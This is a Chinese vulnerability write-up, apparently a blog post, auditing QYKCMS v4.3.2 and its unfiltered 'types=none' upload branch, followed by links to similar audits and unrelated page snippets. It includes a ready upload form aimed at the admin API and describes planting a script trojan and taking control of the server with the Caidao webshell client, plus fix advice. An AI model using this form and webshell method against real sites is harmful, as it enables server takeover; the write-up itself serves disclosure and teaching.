【代码审计】QYKCMS_v4.3.2 任意文件上传漏洞分析
0x00 环境准备
QYKCMS官网:http://www.qykcms.com/
网站源码版本:QYKCMS_v4.3.2(企业站主题)
程序源码下载:http://bbs.qingyunke.com/thread-13.htm
测试网站首页:

0x01 代码分析
1、漏洞文件位置:/admin_system/include/lib/upfile.php 第24-69行:
- switch($types){
- case 'template':
- if(!ispower($admin_group,'skin_upload'))ajaxreturn(1,'error4');
- $typename=strtolower(pathinfo($_FILES['file']['name'],PATHINFO_EXTENSION));
- $filename=strtolower($_FILES['file']['name']);
- if(!in_array($typename,array('html','css','js','jpg','gif','png')))ajaxreturn(1,'error');
- $path=arg('path','all','url');
- $filepath='../'.setup_webfolder.$website['webid'].'/'.$path.'/'.$filename;
- $isup=false;
- 10. $path2=$filepath;
- 11. for($i=1;$i<=10000;$i++){
- 12. if(file_exists($path2)){
- 13. $path2=preg_replace('/\.'.$typename.'$/','_'.$i.'.'.$typename.'',$filepath);
- 14. }else{
- 15. $filepath=$path2;
- 16. $isup=true;
- 17. break;
- 18. }
- 19. }
- 20. if($isup){
- 21. move_uploaded_file($_FILES['file']['tmp_name'],$filepath);
- 22. infoadminlog($website['webid'],$tcz['admin'],24,'上传模板文件:'.$path.'/'.$filename);
- 23. $res='http://'.$website['setup_weburl'].'/'.$website['upfolder'].setup_uptemp.'|'.$filename;
- 24. }else{
- 25. ajaxreturn(1,'error3'); //文件重名
- 26. }
- 27. break;
- 28. case 'none':
- 29. //$oldname=strtolower($_FILES['file']['name']);
- 30. $typename=strtolower(pathinfo($_FILES['file']['name'],PATHINFO_EXTENSION));
- 31. $filename=date('dHis').'_'.randomkeys(6).'.'.$typename;
- 32. $path='../'.$website['upfolder'].setup_uptemp.$filename;
- 33. move_uploaded_file($_FILES['file']['tmp_name'],$path);
- 34. $res='http://'.$website['setup_weburl'].'/'.$website['upfolder'].setup_uptemp.'|'.$filename;
- 35. break;
- 36. case 'theme':
- 37. if(!ispower($admin_group,'super'))ajaxreturn(1,'error4');
- 38. $typename=strtolower(pathinfo($_FILES['file']['name'],PATHINFO_EXTENSION));
- 39. if($typename!='zip')ajaxreturn(1,'error');
- 40. $dir='../'.$website['upfolder'].setup_uptemp;
- 41. $filename='qyk_theme_new.zip';
- 42. $path=$dir.$filename;
- 43. move_uploaded_file($_FILES['file']['tmp_name'],$path);
- 44. infoadminlog($website['webid'],$tcz['admin'],24,'上传主题安装包');
- 45. $res='http://'.$website['setup_weburl'].'/'.$website['upfolder'].setup_uptemp.'|'.$filename;
- 46. break;
这段代码根据types的值进行操作,可以发现当$types=none的时候(注意看红色代码部分),获取文件名后缀,拼接成完整路径,然后将文件上传到服务器。
并没有对文件类型进行过滤,导致程序在实现上存在任意文件上传漏洞,攻击者可以通过上传脚本木马,控制服务器权限。
0x02 漏洞利用
1、构造Form表单:
- <form enctype="multipart/form-data" action="http://127.0.0.1/admin_system/api.php?admin=admin&key=15bc30cb5bfc1775c4733c9558fded91&log=upfile&types=none" method="post">
- Upload a new file:<br>
- <input type="file" name="file" size="50"><br>
- <input type="submit" value="Upload">
- </form>
2、成功上传脚本木马,并回显上传路径

3、去掉文件名称的第一个“|”符,然后访问脚本木马地址

4、通过菜刀连接,成功控制网站服务器

0x03 修复建议
1、通过白名单限制上传文件后缀
2、禁止上传目录脚本执行权限。
最后
欢迎关注个人微信公众号:Bypass--,每周原创一篇技术干货。

【代码审计】QYKCMS_v4.3.2 任意文件上传漏洞分析的更多相关文章
- 【代码审计】JTBC(CMS)_PHP_v3.0 任意文件上传漏洞分析
0x00 环境准备 JTBC(CMS)官网:http://www.jtbc.cn 网站源码版本:JTBC_CMS_PHP(3.0) 企业版 程序源码下载:http://download.jtbc. ...
- 【代码审计】CLTPHP_v5.5.3 前台任意文件上传漏洞分析
0x00 环境准备 CLTPHP官网:http://www.cltphp.com 网站源码版本:CLTPHP内容管理系统5.5.3版本 程序源码下载:https://gitee.com/chich ...
- 【代码审计】UKCMS_v1.1.0 文件上传漏洞分析
0x00 环境准备 ukcms官网:https://www.ukcms.com/ 程序源码下载:http://down.ukcms.com/down.php?v=1.1.0 测试网站首页: 0x0 ...
- UEditor编辑器两个版本任意文件上传漏洞分析
0x01 前言 UEditor是由百度WEB前端研发部开发的所见即所得的开源富文本编辑器,具有轻量.可定制.用户体验优秀等特点 ,被广大WEB应用程序所使用:本次爆出的高危漏洞属于.NET版本,其它的 ...
- [转]UEditor编辑器两个版本任意文件上传漏洞分析
0x01 前言 UEditor是由百度WEB前端研发部开发的所见即所得的开源富文本编辑器,具有轻量.可定制.用户体验优秀等特点 ,被广大WEB应用程序所使用:本次爆出的高危漏洞属于.NET版本,其它的 ...
- 【代码审计】XYHCMS V3.5文件上传漏洞分析
0x00 环境准备 XYHCMS官网:http://www.xyhcms.com/ 网站源码版本:XYHCMS V3.5(2017-12-04 更新) 程序源码下载:http://www.xyhc ...
- 关于finecms v5 会员头像 任意文件上传漏洞分析
看到我私藏的一个洞被别人提交到补天拿奖金,所以我干脆在社区这里分享,给大家学习下 本文原创作者:常威,本文属i春秋原创奖励计划,未经许可禁止转载! 1.定位功能 下载源码在本地搭建起来后,正常登陆了用 ...
- PHPCMS v9.6.0 任意文件上传漏洞分析
引用源:http://paper.seebug.org/273/ 配置了php debug的环境,并且根据这篇文章把流程走了一遍,对phpstorm的debug熟练度+1(跟pycharm一样) 用户 ...
- [代码审计]XiaoCms(后台任意文件上传至getshell,任意目录删除,会话固定漏洞)
0x00 前言 这段时间就一直在搞代码审计了.针对自己的审计方法做一下总结,记录一下步骤. 审计没他,基础要牢,思路要清晰,姿势要多且正. 下面是自己审计的步骤,正在逐步调整,寻求效率最高. 0x01 ...
随机推荐
- radio切换,点击方法onclick
<label><input name="Status1" type="radio" value="first" check ...
- 安卓程序代写 网上程序代写[原]BluetoothSocket详解
一. BluetoothSocket简介 1. 简介 客户端与服务端 : BluetoothSocket 和 BluetoothServerSocket 类似于Java中的套接字的 Socket 和 ...
- SDRAM 学习笔记(三)
上图是terasic公司提供的SDRAM控制器,大部分已经封装好,我们需要修改其中部分代码,以此来实现我们自己需要的功能. 1.PLL时钟设定 首先上面的sdram_pll.v中产生上一篇博客所需要的 ...
- C#基础 ---------------单利模式
一.引言 最近在设计模式的一些内容,主要的参考书籍是<Head First 设计模式>,同时在学习过程中也查看了很多博客园中关于设计模式的一些文章的,在这里记录下我的一些学习笔记,一是为了 ...
- 详细分析Java中断机制[转]
1. 引言 当我们点击某个杀毒软件的取消按钮来停止查杀病毒时,当我们在控制台敲入quit命令以结束某个后台服务时……都需要通过一个线程去取消另一个线程正在执行的任务.Java没有提供一种安全直接的方法 ...
- 本机IP、127.0.0.1和0.0.0.0的区别
本机ip.127.0.0.1和0.0.0.0区别 网络java IP地址的记法: IP地址由四个字节构成,为了方便阅读和书写,每个字节用0-255的数字表示,字节之间用’.'分割,如: 10.10 ...
- Type cvc-complex-type.2.4.c: The matching wildcard is strict...
这个问题困扰了我两次,分别说一下原因:1. 如网上一些网友所言,是在配置Spring的标签库的时候有拼写错误或者遗漏.下面贴一个标准3.0的吧: <?xml version="1.0& ...
- C# 线程池执行操作例子
public partial class Form1 : Form { CountdownEvent hander = ); public static object lock_action = ne ...
- Throwable vs Exception
Throwable中的Error是不需要程序处理的. Exception是需要处理的.
- UNIX环境编程学习笔记(6)——文件I/O之判断文件类型
lienhua342014-09-01 1 文件类型 我们平时最常接触的文件类型有普通文件(regular file)和目录(di-rectory file),但是 UNIX 系统提供了多种文件类型: ...